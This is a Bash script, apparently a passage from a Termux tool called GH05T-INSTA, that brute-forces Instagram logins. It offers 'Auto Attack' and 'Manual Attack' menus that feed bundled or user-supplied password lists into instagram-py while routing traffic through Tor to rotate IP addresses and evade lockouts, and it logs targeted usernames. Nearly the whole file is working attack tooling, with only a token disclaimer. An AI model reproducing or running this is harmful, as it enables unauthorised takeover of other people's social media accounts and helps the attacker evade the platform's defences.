		rm /data/data/com.termux/files/usr/bin/gh05t >/dev/null 2>&1
	else
		echo ""
		clear
	fi
	if [ -d /data/data/com.termux/files/home/GH05T-INSTA ]; then
		echo ""
		rm -rf data/data/com.termux/files/home/GH05T-INSTA >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	clear 
	exit
}

function loop-infos () {
	echo -e "  \033[1;37m[\033[0;31m99\033[1;37m]\033[0;32m Main                         \033[1;37m[\033[0;31m00\033[1;37m]\033[0;32m Exit"
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Choose an option : \e[0m' options
	if [ $options = "00" ]; then
		echo ""
		reopens
		clear
		exit
	elif [ $options = "99" ]; then
		echo ""
		clear
		main-loop
		exit
	else
		echo ""
		clear
		help-info
		loop-infos
		exit
	fi
}

function help-info () {
	banners
	sleep 3
	echo "
	$ gh05t
	{ After entering this command you will get an option for everything }
	{ Nach Eingabe dieses Befehls erhalten Sie eine Option für alles }
	$ gh05t --user username --pass 1
	{ After running this command the brute force will start }
	{ Nach Ausführung dieses Befehls wird die Brute Force gestartet }
	(             How To Use            )
	( gh05t --user mr_77778#8 --pass 2 )
	( gh05t --user mr_fqake#@ --pass 3 )
	( gh05t --user jdjza888#8 --pass 4 )
	( gh05t --user gersman_9#6# --pass 6 )
	( gh05t --user mr_77bd778#8 --pass 7 )
	( gh05t --user ar_fake#@ --pass 8 )
	( gh05t --user li888#8 --pass 9 )
	( gh05t --user mtrman_9#6# --pass 10 )
	( gh05t --user jr_77778#8 --pass 11 )
	( gh05t --user ig_fake#@ --pass 12 )
	( gh05t --user hsjza888#8 --pass 13 )
	( gh05t --user gelian_9#6# --pass 14 )
	( gh05t --user gehsghan_9#6# --pass 15 )
	( gh05t --user jr7778#s8 --pass 16 )
	( gh05t --user igahacke#@ --pass 17 )
	( gh05t --user hsjd888#8 --pass 18 )
	( gh05t --user gehdhan_9#6# --pass 19 )
	( gh05t --user gehsgan_9#6# --pass 20 )
	(     Total Password List 20        )
	$ gh05t --user username --passadd Your-Pass
	{ After running this command the brute force will start }
	{ Nach Ausführung dieses Befehls wird die Brute Force gestartet }
	(                       How To Use                        )
	( gh05t --user mr_77778#8 --passadd /data/data/com.termux/files/home/password.txt )
	( gh05t --user mr_fake#@ --passadd /data/data/com.termux/files/home/storage/shared/worldlist.txt )
	( gh05t --user liza888#8 --passadd /data/data/com.termux/files/home/storage/downloads/pizza.txt
	( gh05t --user german_9#6# --passadd /data/data/com.termux/files/home/my-pass.txt )
	(                Enter your password location and name                   )
	$ gh05t --help
	{ Try this command for informatio okn about this tool }
	{ Probieren Sie diesen Befehl aus, um Informationen zu diesem Tool zu erhalten }
	$ ghost --check
	{ To reinstall deleted files (FPP) solution }
	{ Um gelöschte Dateien neu zu installieren  (FPP) solution }
	$ gh05t --update
	{ Try this command and you will get new updates }
	{ Probieren Sie diesen Befehl aus und Sie erhalten neue Updates }
	$ gh05t --error
	{ Run this command if you encounter errors while running this tool }
	{ Führen Sie diesen Befehl aus, wenn beim Ausführen dieses Tools Fehler auftreten }
	$ gh05t developer 
	{ To contact the developer }
	{ Um den Entwickler zu kontaktieren }
	$ gh05t --cookies
	{ After running this command you can see the username }
	{ Nachdem Sie diesen Befehl ausgeführt haben, können Sie den Benutzernamen sehen }
	$ gh05t uninstall all
	{ Delete Gh05t }
	{ Removes all packages related to gh05t }
	{ Entfernt alle Pakete, die sich auf gh05t beziehen }"
	reopens
}

clear
if [ $3 = "--pass" ] >/dev/null 2>&1
then
	echo ""
	if [ $1 = "--user" ]; then
		clear
		if [ $4 = 1 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-1.txt"
		elif [ $4 = 2 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-2.txt"
		elif [ $4 = 3 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-3.txt"
		elif [ $4 = 4 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-4.txt"
		elif [ $4 = 5 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-5.txt"
		elif [ $4 = 6 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-6.txt"
		elif [ $4 = 7 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-7.txt"
		elif [ $4 = 8 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-8.txt"
		elif [ $4 = 9 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-9.txt"
		elif [ $4 = 10 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-10.txt"
		elif [ $4 = 11 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-11.txt"
		elif [ $4 = 12 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-12.txt"
		elif [ $4 = 13 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-13.txt"
		elif [ $4 = 14 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-14.txt"
		elif [ $4 = 15 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-15.txt"
		elif [ $4 = 16 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-16.txt"
		elif [ $4 = 17 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-17.txt"
		elif [ $4 = 18 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-18.txt"
		elif [ $4 = 19 ]; then
			value="/data/data/com.termux/files/usr/cookies/password-19.txt"
		elif [ $4 = 20 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-20.txt"
		else
			clear
			echo " choose password option"
			exit
		fi
		kill-insta
		clear 
		tor > /dev/null 2>&1 &
		echo -e "\033[1;37m +----------------------------------------------+"
		echo -e "\033[1;37m |              \033[0;31m       Tor                   \033[1;37m   |"
		echo -e "\033[1;37m |\033[0;32mIt is an acronym for Onion Router, a free and\033[1;37m |"
		echo -e "\033[1;37m |\033[0;32m open source software for enabling anonymous \033[1;37m |"
		echo -e "\033[1;37m | \033[0;32m communication. It drives worldwide internet\033[1;37m |"
		echo -e "\033[1;37m |       \033[0;32m         traffic for free,         \033[1;37m    |"
		echo -e "\033[1;37m |\033[0;31m   We use the Tor network to handle your IP  \033[1;37m |"
		echo -e "\033[1;37m |\033[0;31m   changes, so your password is likely to be \033[1;37m |"
		echo -e "\033[1;37m |\033[0;31m          repeated as your IP changes.       \033[1;37m |"
		echo -e "\033[1;37m +----------------------------------------------+"
		sleep 4
		echo -e " \033[1;37m Useful"
		clear
		bash /data/data/com.termux/files/usr/cookies/instaapi.sh
		clear 
		banners
		cd /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		php -S 127.0.0.1:4444 > /dev/null 2>&1 &
		sleep 1
		echo "  User : $2 " >> /data/data/com.termux/files/usr/cookies/cookie.txt 
		echo -e "${restar}GH05T-INSTA 3.01 , gh05t tool helps you to automatically change your IP address and fix errors." 
		instagram-py --username $2 --password-list $value
		xdg-open http://127.0.0.1:4444  > /dev/null 2>&1 &
		reopens
		sleep 3
		echo -e " \033[1;37m +----------------------------------------------+"
		echo -e " \033[1;37m |\033[0;31m Developer\033[1;37m :\033[0;34m GH05T HUNTER5   \033[0;31m  version\033[1;37m  :\033[0;34m 7.01\033[1;37m|"
		echo -e " \033[1;37m |\033[0;31m Powered  \033[1;37m :\033[0;34m Instagram-py    \033[0;31m  antony-jr\033[1;37m:\033[0;34m 20.3\033[1;37m|"
		echo -e " \033[1;37m +----------------------------------------------+"
		echo -e " \033[1;37m |              \033[0;31m     disclaimer   \033[1;37m              |"
		echo -e " \033[1;37m |   We are not responsible if you misuse it    |"
		echo -e " \033[1;37m |   Never use this tool to do illegal things   |"
		echo -e " \033[1;37m +----------------------------------------------+"
		sleep 10
		exit
	else
		echo " Something Wrong"
	fi
	elif [ $3 = "--passadd" ] >/dev/null 2>&1
	then
	echo ""
	if [ $1 = "--user" ]; then
		echo ""
		cp -r $4 /data/data/com.termux/files/usr/cookies/ >/dev/null 2>&1
		kill-insta
		clear
		tor > /dev/null 2>&1 &
		echo -e "\033[1;37m +----------------------------------------------+"
		echo -e "\033[1;37m |              \033[0;31m       Tor                   \033[1;37m   |"
		echo -e "\033[1;37m |\033[0;32mIt is an acronym for Onion Router, a free and\033[1;37m |"
		echo -e "\033[1;37m |\033[0;32m open source software for enabling anonymous \033[1;37m |"
		echo -e "\033[1;37m | \033[0;32m communication. It drives worldwide internet\033[1;37m |"
		echo -e "\033[1;37m |       \033[0;32m         traffic for free,         \033[1;37m    |"
		echo -e "\033[1;37m |\033[0;31m   We use the Tor network to handle your IP  \033[1;37m |"
		echo -e "\033[1;37m |\033[0;31m   changes, so your password is likely to be \033[1;37m |"
		echo -e "\033[1;37m |\033[0;31m          repeated as your IP changes.       \033[1;37m |"
		echo -e "\033[1;37m +----------------------------------------------+"
		sleep 4
		echo -e " \033[1;37m Useful"
		clear
		bash /data/data/com.termux/files/usr/cookies/instaapi.sh
		clear 
		banners
		cd /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		php -S 127.0.0.1:4444 > /dev/null 2>&1 &
		sleep 1
		echo "  User : $2 " >> /data/data/com.termux/files/usr/cookies/cookie.txt
		echo -e "${restar}GH05T-INSTA 3.01 , gh05t tool helps you to automatically change your IP address and fix errors." 
		instagram-py --username $2 --password-list $4
		xdg-open http://127.0.0.1:4444  > /dev/null 2>&1 &
		reopens
		sleep 3
		echo -e " \033[1;37m +----------------------------------------------+"
		echo -e " \033[1;37m |\033[0;31m Developer\033[1;37m :\033[0;34m GH05T HUNTER5   \033[0;31m  version\033[1;37m  :\033[0;34m 7.01\033[1;37m|"
		echo -e " \033[1;37m |\033[0;31m Powered  \033[1;37m :\033[0;34m Instagram-py    \033[0;31m  antony-jr\033[1;37m:\033[0;34m 20.3\033[1;37m|"
		echo -e " \033[1;37m +----------------------------------------------+"
		echo -e " \033[1;37m |              \033[0;31m     disclaimer   \033[1;37m              |"
		echo -e " \033[1;37m |   We are not responsible if you misuse it    |"
		echo -e " \033[1;37m |   Never use this tool to do illegal things   |"
		echo -e " \033[1;37m +----------------------------------------------+"
		sleep 10
		exit
	else
		clear
		echo " Something Wrong"
		exit
	fi
elif [ $1 = "--help" ] >/dev/null 2>&1
then
	echo ""
	clear
	help-info
	exit
elif [ $1 = "--update" ] >/dev/null 2>&1
then
	echo ""
	clear
	update-info
	exit
elif [ $1 = "--error" ] >/dev/null 2>&1
then
	echo ""
	clear
	error-info
	exit
elif [ $1 = "--check" ] >/dev/null 2>&1
then
	echo ""
	clear
	check-info
	exit
elif [ $1 = "--cookies" ] >/dev/null 2>&1
then
	echo ""
	clear
	cookies-info
	exit
elif [ $1 = "uninstall" ] >/dev/null 2>&1
then
	echo ""
	clear
	if [ $2 = "all" ]; then
		echo ""
		clear
		killmeall
	else
		clear
		echo " Try Again"
		sleep 4
		clear
		echo ""
		exit
	fi
	echo ""
else
	echo ""
	clear 
fi
clear

function auto-attack () {
	echo ""
	clear
	banners
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m××\033[1;37m]\033[0;32m Lines  Password type                  \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m01\033[1;37m]\033[0;32m 1059   Passwords mixed                \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m02\033[1;37m]\033[0;32m 65536  Passwords numbers              \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m03\033[1;37m]\033[0;32m 65536  Passwords ABCD                 \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m04\033[1;37m]\033[0;32m 65536  Passwords Number and ABCD      \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m05\033[1;37m]\033[0;32m 65536  Passwords Numbers {extra}      \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m06\033[1;37m]\033[0;32m 448    Passwords name and numbers     \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m07\033[1;37m]\033[0;32m 1501   Passwords name and numbers     \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m08\033[1;37m]\033[0;32m 100    Passwords mixed                \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m09\033[1;37m]\033[0;32m 300    Passwords mixed                \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m10\033[1;37m]\033[0;32m 2900   Passwords fpp names & numbers  \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m11\033[1;37m]\033[0;32m 3000   Passwords regular pass         \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m12\033[1;37m]\033[0;32m 800    Passwords simple  social       \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m13\033[1;37m]\033[0;32m 1059   Passwords mixed                \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m14\033[1;37m]\033[0;32m 1059   Passwords mixed                \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m15\033[1;37m]\033[0;32m 1059   Passwords mixed                \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m16\033[1;37m]\033[0;32m 3106   Passwords wal comm             \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m17\033[1;37m]\033[0;32m 181    Passwords mix                  \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m18\033[1;37m]\033[0;32m 306706 Passwords Big box fpp          \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m19\033[1;37m]\033[0;32m 1000   Passwords English ls number    \033[1;37m  |"
	echo -e " \033[1;37m | \033[1;37m[\033[0;31m20\033[1;37m]\033[0;32m 20     Passwords My Password          \033[1;37m  |"
	echo -e " \033[1;37m +----------------------------------------------+"
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Enter Your Instagram Username : \e[0m' username
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Enter Pssword Type            : \e[0m' passnum
	clear
	if [ $passnum = 1 ] || [ $passnum = 01 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-1.txt"
	elif [ $passnum = 2 ] || [ $passnum = 02 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-2.txt"
	elif [ $passnum = 3 ] || [ $passnum = 03 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-3.txt"
	elif [ $passnum = 4 ] || [ $passnum = 04 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-4.txt"
	elif [ $passnum = 5 ] || [ $passnum = 05 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-5.txt"
	elif [ $passnum = 6 ] || [ $passnum = 06 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-6.txt"
	elif [ $passnum = 7 ] || [ $passnum = 07 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-7.txt"
	elif [ $passnum = 8 ] || [ $passnum = 08 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-8.txt"
	elif [ $passnum = 9 ] || [ $passnum = 09 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-9.txt"
	elif [ $passnum = 10 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-10.txt"
	elif [ $passnum = 11 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-11.txt"
	elif [ $passnum = 12 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-12.txt"
	elif [ $passnum = 13 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-13.txt"
	elif [ $passnum = 14 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-14.txt"
	elif [ $passnum = 15 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-15.txt"
	elif [ $passnum = 16 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-16.txt"
	elif [ $passnum = 17 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-17.txt"
	elif [ $passnum = 18 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-18.txt"
	elif [ $passnum = 19 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-19.txt"
	elif [ $passnum = 20 ]; then
		value="/data/data/com.termux/files/usr/cookies/password-20.txt"
	else
		clear
		echo " choose password Type"
		auto-attack
		exit
	fi
	clear
	echo -e "\033[1;37m +----------------------------------------------+"
	echo -e "\033[1;37m |              \033[0;31m       Tor                   \033[1;37m   |"
	echo -e "\033[1;37m |\033[0;32mIt is an acronym for Onion Router, a free and\033[1;37m |"
	echo -e "\033[1;37m |\033[0;32m open source software for enabling anonymous \033[1;37m |"	
	echo -e "\033[1;37m | \033[0;32m communication. It drives worldwide internet\033[1;37m |"
	echo -e "\033[1;37m |       \033[0;32m         traffic for free,         \033[1;37m    |"
	echo -e "\033[1;37m |\033[0;31m   We use the Tor network to handle your IP  \033[1;37m |"
	echo -e "\033[1;37m |\033[0;31m   changes, so your password is likely to be \033[1;37m |"
	echo -e "\033[1;37m |\033[0;31m          repeated as your IP changes.       \033[1;37m |"
	echo -e "\033[1;37m +----------------------------------------------+"
	sleep 4
	echo -e " \033[1;37m Useful"
	tor > /dev/null 2>&1 &
	clear
	bash /data/data/com.termux/files/usr/cookies/instaapi.sh
	clear 
	banners
	cd /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
	php -S 127.0.0.1:4444 > /dev/null 2>&1 &
	sleep 1
	echo "  User : $username " >> /data/data/com.termux/files/usr/cookies/cookie.txt 
	echo -e "${restar}GH05T-INSTA 3.01 , gh05t tool helps you to automatically change your IP address and fix errors." 
	instagram-py --username $username --password-list $value
	xdg-open http://127.0.0.1:4444  > /dev/null 2>&1 &
	reopens
	sleep 3
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |\033[0;31m Developer\033[1;37m :\033[0;34m GH05T HUNTER5   \033[0;31m  version\033[1;37m  :\033[0;34m 7.01\033[1;37m|"
	echo -e " \033[1;37m |\033[0;31m Powered  \033[1;37m :\033[0;34m Instagram-py    \033[0;31m  antony-jr\033[1;37m:\033[0;34m 20.3\033[1;37m|"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |              \033[0;31m     disclaimer   \033[1;37m              |"
	echo -e " \033[1;37m |   We are not responsible if you misuse it    |"
	echo -e " \033[1;37m |   Never use this tool to do illegal things   |"
	echo -e " \033[1;37m +----------------------------------------------+"
	sleep 10
	exit
}
function Manual-attack () {
	echo ""
	clear
	banners
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Enter Your Instagram Username                : \e[0m' username
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Enter your password path along with name : \e[0m' passnum
	echo "" 
	cp -r $4 /data/data/com.termux/files/usr/cookies/ >/dev/null 2>&1
	tor > /dev/null 2>&1 &
	clear
	echo -e "\033[1;37m +----------------------------------------------+"
	echo -e "\033[1;37m |              \033[0;31m       Tor                   \033[1;37m   |"
	echo -e "\033[1;37m |\033[0;32mIt is an acronym for Onion Router, a free and\033[1;37m |"
	echo -e "\033[1;37m |\033[0;32m open source software for enabling anonymous \033[1;37m |"
	echo -e "\033[1;37m | \033[0;32m communication. It drives worldwide internet\033[1;37m |"
	echo -e "\033[1;37m |       \033[0;32m         traffic for free,         \033[1;37m    |"
	echo -e "\033[1;37m |\033[0;31m   We use the Tor network to handle your IP  \033[1;37m |"	
	echo -e "\033[1;37m |\033[0;31m   changes, so your password is likely to be \033[1;37m |"
	echo -e "\033[1;37m |\033[0;31m          repeated as your IP changes.       \033[1;37m |"
	echo -e "\033[1;37m +----------------------------------------------+"
	sleep 4
	echo -e " \033[1;37m Useful"
	clear
	bash /data/data/com.termux/files/usr/cookies/instaapi.sh
	clear 
	banners	
	cd /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
	php -S 127.0.0.1:4444 > /dev/null 2>&1 &
	sleep 1
	echo "  User : $username " >> /data/data/com.termux/files/usr/cookies/cookie.txt 
	echo -e "${restar}GH05T-INSTA 3.01 , gh05t tool helps you to automatically change your IP address and fix errors." 
	instagram-py --username $username --password-list $passnum
	xdg-open http://127.0.0.1:4444  > /dev/null 2>&1 &
	reopens
	sleep 3
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |\033[0;31m Developer\033[1;37m :\033[0;34m GH05T HUNTER5   \033[0;31m  version\033[1;37m  :\033[0;34m 7.01\033[1;37m|"
	echo -e " \033[1;37m |\033[0;31m Powered  \033[1;37m :\033[0;34m Instagram-py    \033[0;31m  antony-jr\033[1;37m:\033[0;34m 20.3\033[1;37m|"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |              \033[0;31m     disclaimer   \033[1;37m              |"
	echo -e " \033[1;37m |   We are not responsible if you misuse it    |"
	echo -e " \033[1;37m |   Never use this tool to do illegal things   |"
	echo -e " \033[1;37m +----------------------------------------------+"
	sleep 10
	exit
}
function main-loop () {
	breakme
	clear
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m | \033[0;32m  ██████╗ ██╗  ██╗ ██████╗ ███████╗████████╗\033[1;37m |"	
	echo -e " \033[1;37m |\033[0;32m  ██╔════╝ ██║  ██║██╔═████╗██╔════╝╚══██╔══╝\033[1;37m |"
	echo -e " \033[1;37m |\033[0;32m  ██║  ███╗███████║██║██╔██║███████╗   ██║ \033[1;37m   |"
	echo -e " \033[1;37m |\033[0;32m  ██║   ██║██╔══██║████╔╝██║╚════██║   ██║ \033[1;37m   |"
	echo -e " \033[1;37m |\033[0;32m  ╚██████╔╝██║  ██║╚██████╔╝███████║   ██║ \033[1;37m   |"
	echo -e " \033[1;37m | \033[0;32m  ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚══════╝   ╚═╝ \033[1;37m   |"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |  \033[0;32m   ██╗███╗   ██╗███████╗████████╗ █████╗  \033[1;37m  |"
	echo -e " \033[1;37m |  \033[0;32m   ██║████╗  ██║██╔════╝╚══██╔══╝██╔══██╗  \033[1;37m |"
	echo -e " \033[1;37m |  \033[0;32m   ██║██╔██╗ ██║███████╗   ██║   ███████║ \033[1;37m  |"
	echo -e " \033[1;37m |  \033[0;32m   ██║██║╚██╗██║╚════██║   ██║   ██╔══██║  \033[1;37m |"
	echo -e " \033[1;37m |  \033[0;32m   ██║██║ ╚████║███████║   ██║   ██║  ██║ \033[1;37m  |"
	echo -e " \033[1;37m |  \033[0;32m   ╚═╝╚═╝  ╚═══╝╚══════╝   ╚═╝   ╚═╝  ╚═╝ \033[1;37m  |"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |\033[0;31m Developer\033[1;37m :\033[0;34m GH05T HUNTER5   \033[0;31m  version\033[1;37m  :\033[0;34m 7.01\033[1;37m|"
	echo -e " \033[1;37m |\033[0;31m Instagram\033[1;37m :\033[0;34m GH05T_HUNTER5   \033[0;31m  FPP    \033[1;37m  :\033[0;34m 20.3\033[1;37m|"
	echo -e " \033[1;37m |\033[0;31m Powered  \033[1;37m :\033[0;34m Instagram-py    \033[0;31m  antony-jr\033[1;37m:\033[0;34m 2.07\033[1;37m|"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |\033[0;31m We strive to provide the best service for you\033[1;37m|"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e "  \033[1;37m[\033[0;31m01\033[1;37m]\033[0;32m Auto Attack"
	echo -e "  \033[1;37m[\033[0;31m02\033[1;37m]\033[0;32m Manual Attack"
	echo -e "  \033[1;37m[\033[0;31m03\033[1;37m]\033[0;32m Update"
	echo -e "  \033[1;37m[\033[0;31m04\033[1;37m]\033[0;32m Error"
	echo -e "  \033[1;37m[\033[0;31m06\033[1;37m]\033[0;32m Cookies"
	echo -e "  \033[1;37m[\033[0;31m07\033[1;37m]\033[0;32m Check"
	echo -e "  \033[1;37m[\033[0;31m08\033[1;37m]\033[0;32m Report"
	echo -e "  \033[1;37m[\033[0;31m09\033[1;37m]\033[0;32m Uninstall gh05t"
	echo -e "  \033[1;37m[\033[0;31m99\033[1;37m]\033[0;32m Help"
	echo -e "  \033[1;37m[\033[0;31m00\033[1;37m]\033[0;32m Exit"
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Choose an option : \e[0m' option
	if [ -z $option ]; then
		echo ""
		main-loop
	elif [ $option = "01" ] || [ $option = "1" ]; then
		echo ""
		clear
		auto-attack
		clear
		exit
	elif [ $option = "02" ] || [ $option = "2" ]; then
		echo ""
		clear
		Manual-attack
		clear
		exit
	elif [ $option = "03" ] || [ $option = "3" ]; then
		echo ""
		clear
		update-info
		clear
		exit
	elif [ $option = "04" ] || [ $option = "4" ]; then
		echo ""
		clear
		error-info
		clear
		check-info
		clear
		exit
	elif [ $option = "06" ] || [ $option = "6" ]; then
		echo ""
		clear
		cookies-info
		clear
		main-loop
		clear
	elif [ $option = "07" ] || [ $option = "7" ]; then
		echo ""
		clear
		check-info
		clear
		main-loop
		clear
	elif [ $option = "09" ] || [ $option = "9" ]; then
		echo ""
		clear
		killmeall
		clear
		main-loop
		clear
	elif [ $option = "08" ] || [ $option = "8" ]; then
		echo ""
		clear 
		report-info
		clear
		main-loop
		clear
	elif [ $option = "00" ] || [ $option = "0" ]; then
		echo ""
		clear
		exit
	elif [ $option = "99" ]; then
		echo ""
		clear
		help-info
		loop-infos
		exit
	else
		echo ""
		clear
		echo " Something Wrong"
		sleep 3
		clear
		main-loop
		exit
	fi
	clear
	main-loop
}
main-loop
